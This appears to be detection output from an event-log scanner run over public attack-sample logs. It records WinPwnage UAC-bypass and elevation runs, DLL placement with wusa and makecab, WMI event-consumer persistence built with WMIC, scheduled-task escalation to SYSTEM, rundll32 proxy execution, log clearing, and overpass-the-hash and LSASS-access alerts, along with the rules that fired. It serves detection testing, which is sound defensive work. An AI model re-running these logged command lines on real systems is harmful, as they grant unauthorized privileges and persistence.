+2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe""   :  Path: C:\Windows\System32\cliconfg.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe""   :  Path: C:\Windows\System32\cliconfg.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab  :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe""   :  Path: C:\Windows\ehome\Mcx2Prov.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe""   :  Path: C:\Windows\ehome\Mcx2Prov.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab  :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab  :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser  :  Workstation:   :  IP Address: ::1  :  Port: 0  :  LogonID: 0x1bbdce  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini  :  Path: C:\Windows\System32\cmstp.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""'  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator  :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator  :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator  :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,OpenURL file://C:/Windows/system32/calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,FileProtocolHandler calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
